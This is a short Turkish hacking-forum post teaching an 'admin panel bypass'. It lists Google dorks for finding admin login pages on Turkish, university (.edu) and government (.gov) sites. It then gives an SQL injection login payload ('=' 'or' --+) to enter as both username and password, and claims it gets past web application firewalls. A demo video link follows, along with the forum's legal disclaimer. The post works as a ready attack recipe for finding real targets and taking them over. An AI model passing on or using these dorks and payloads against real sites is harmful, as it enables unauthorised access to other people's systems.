Admin panel bypass

cashless

Üye
20 Nis 2020
217
3
İzmir
Bu yazımda admin panel bypass yöntemini göstereceğim


Dork Yazarak admin paneli bulabiliriz.


örnek dork: inurl:"admin.php"
dork şunu kastediyor içinde admin.php olan siteleri göster



örnek dork: inurl:"com.tr"
dork şunu kastediyor domainde com.tr olan siteleri getir.


örnek dork: inurl:"com.tr" inurl"admin.php"
iki dorku birleştirdim ve com.tr li sitelerde admin.php dosyasına sahip olan siteleri getiriyor.


Örnek Dork:
site:"edu" inurl:"admin/login" --> Üniversite sitesi admin panel dorku

site:"gov" inurl:"admin/login" --> Devlet sitesi admin panel dorku


Admin panel bypass


normal de '=' 'or' olmasına rağmen waf atlatmak için sonuna --+ ekleyerek güvenlik duvarı atlatabiliyoruz


Admin Kullanıcı Adı: '=' 'or' --+
Parola: '=' 'or' --+



Not: videodaki sitelerle iletişime geçilip açık kapatılmıştır bilginize...



ÖRNEK VİDEO






https://www.youtube.com/watch?v=n8QiuUlz9us












.
 
Son düzenleme:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.